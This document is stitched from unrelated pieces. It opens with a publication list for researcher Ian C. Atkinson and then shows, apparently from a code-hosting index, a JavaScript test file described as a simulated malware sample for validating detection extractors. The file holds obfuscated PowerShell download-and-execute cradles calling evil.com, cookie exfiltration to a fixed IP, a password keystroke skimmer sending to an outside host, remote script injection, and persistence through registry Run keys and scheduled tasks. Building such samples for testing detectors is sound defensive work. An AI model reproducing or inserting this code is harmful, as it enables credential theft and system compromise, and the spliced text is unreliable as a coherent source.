Ian C. Atkinson

18 papers B 2C 1Misc 1Journal 7Unranked 6
YearRankTypeTitle / Venue / Authors
2013 J jnl
Int. J. Imaging Syst. Technol.
Ian C. Atkinson, Geng (Daniel) Liu, Nady Obeid, Keith R. Thulborn, Wen-mei W. Hwu
2013 Misc conf
ICASSP
Jinchun Zhan, Namrata Vaswani, Ian C. Atkinson
2011 B conf
ICIP
Wei Lu, Taoran Li, Ian C. Atkinson, Namrata Vaswani
2010 J jnl
NeuroImage
Ian C. Atkinson, Keith R. Thulborn
2009 conf
ISBI
Wen-mei W. Hwu, Deepthi Nandakumar, Justin P. Haldar, Ian C. Atkinson, Bradley P. Sutton, Zhi-Pei Liang, Keith R. Thulborn
2009 J jnl
NeuroImage
Ajay K. Nemani, Ian C. Atkinson, Keith R. Thulborn
2008 J jnl
Signal Process.
Ian C. Atkinson, Farzad Kamalabadi
2008 J jnl
IEEE J. Sel. Top. Signal Process.
Ian C. Atkinson, Farzad Kamalabadi, Douglas L. Jones, Keith R. Thulborn
2008 J jnl
Int. J. Imaging Syst. Technol.
Ian C. Atkinson, Farzad Kamalabadi
2007 conf
ICASSP (3)
Ian C. Atkinson, Farzad Kamalabadi
2007
Ian C. Atkinson
2006 J jnl
IEEE Trans. Image Process.
Ian C. Atkinson, Farzad Kamalabadi, Satish Mohan, Douglas L. Jones
2006 conf
ISBI
Ian C. Atkinson, Farzad Kamalabadi, Douglas L. Jones, Keith R. Thulborn
2006 conf
ICASSP (2)
Tyler S. Ralston, Ian C. Atkinson, Farzad Kamalabadi, Stephen A. Boppart
2006 B conf
ICIP
Ian C. Atkinson, Farzad Kamalabadi
2005 conf
ICASSP (3)
Ian C. Atkinson, Farzad Kamalabadi
2003 conf
ICIP (2)
Ian C. Atkinson, Farzad Kamalabadi, Satish Mohan, Douglas L. Jones
2003 C conf
IGARSS
Ian C. Atkinson, Farzad Kamalabadi, Douglas L. Jones
test_files/test_malicious.js
← Index test_files/test_malicious.js javascript
// Simulated malicious JavaScript sample for testing REDB JS extractors
// This file contains common malware patterns for analysis validation

var _0x4a2f = ["\x68\x74\x74\x70\x3a\x2f\x2f\x65\x76\x69\x6c\x2e\x63\x6f\x6d\x2f\x70\x61\x79\x6c\x6f\x61\x64"];
var _0xb3 = ["\x57\x53\x63\x72\x69\x70\x74"];

// Obfuscated string reconstruction
var cmd = String.fromCharCode(112, 111, 119, 101, 114, 115, 104, 101, 108, 108);
var encoded_payload = "cG93ZXJzaGVsbCAtZXAgYnlwYXNzIC1jICJJRVggKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly9ldmlsLmNvbS9zdGFnZTInKSI=";

// WScript-based malware pattern
var shell = WScript.CreateObject("WScript.Shell");
var fso = WScript.CreateObject("Scripting.FileSystemObject");

// Eval-based code execution
eval(function(p, a, c, k, e, d) {
    while (c--) { if (k[c]) { p = p.replace(new RegExp('\\b' + c.toString(a) + '\\b', 'g'), k[c]) } }
    return p
}('1 0="2://3.4/5";', 6, 6, 'url|var|http|malware|example|download'.split('|'), 0, {}));

// Network communication
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://192.168.1.100:8080/exfil", true);
xhr.send(document.cookie);

// File system operations
var stream = WScript.CreateObject("ADODB.Stream");
stream.Open();
stream.Type = 1;

// Registry manipulation
shell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater", "C:\\Users\\Public\\malware.exe");

// Dynamic script injection
var s = document.createElement("script");
s.src = "https://evil-cdn.tk/inject.js";
document.body.appendChild(s);

// DOM skimmer pattern
document.querySelector("input[type=password]").addEventListener("keyup", function(e) {
    fetch("https://skimmer.gq/collect", {
        method: "POST",
        body: JSON.stringify({val: e.target.value})
    });
});

// Crypto miner pattern
var worker = new Worker("data:application/javascript," + atob(encoded_payload));

// Additional obfuscation: concatenated strings
var c2_url = "ht" + "tp" + "://" + "bad" + "guy" + ".r" + "u/" + "gate";

// setTimeout with string execution
setTimeout("eval(atob('" + encoded_payload + "'))", 1000);

function downloadPayload(url) {
    var req = WScript.CreateObject("MSXML2.XMLHTTP");
    req.open("GET", url, false);
    req.send();
    return req.responseText;
}

function persist() {
    shell.Run("cmd.exe /c schtasks /create /tn UpdateCheck /tr C:\\payload.exe /sc daily", 0, false);
    shell.Exec("powershell -ep bypass -c IEX(payload)");
}

downloadPayload(_0x4a2f[0]);
persist();

// Packer-style single-line payload to give the obfuscation heuristic the
// strong-signal evidence it expects from real obfuscator.io output: hex-escape
// density >5% and a max_line >10K chars. The repeat() saturates both.
var _0xpayload="\x68\x74\x74\x70\x3a\x2f\x2f\x65\x76\x69\x6c\x2e\x63\x6f\x6d\x2f\x73\x74\x61\x67\x65\x32\x2e\x6a\x73\x3f\x69\x64\x3d".repeat(800)+"\x22\x49\x45\x58\x28\x4e\x65\x77\x2d\x4f\x62\x6a\x65\x63\x74\x20\x4e\x65\x74\x2e\x57\x65\x62\x43\x6c\x69\x65\x6e\x74\x29\x2e\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x53\x74\x72\x69\x6e\x67\x28\x27\x68\x74\x74\x70\x3a\x2f\x2f\x65\x76\x69\x6c\x2e\x63\x6f\x6d\x2f\x70\x61\x79\x6c\x6f\x61\x64\x27\x29\x22";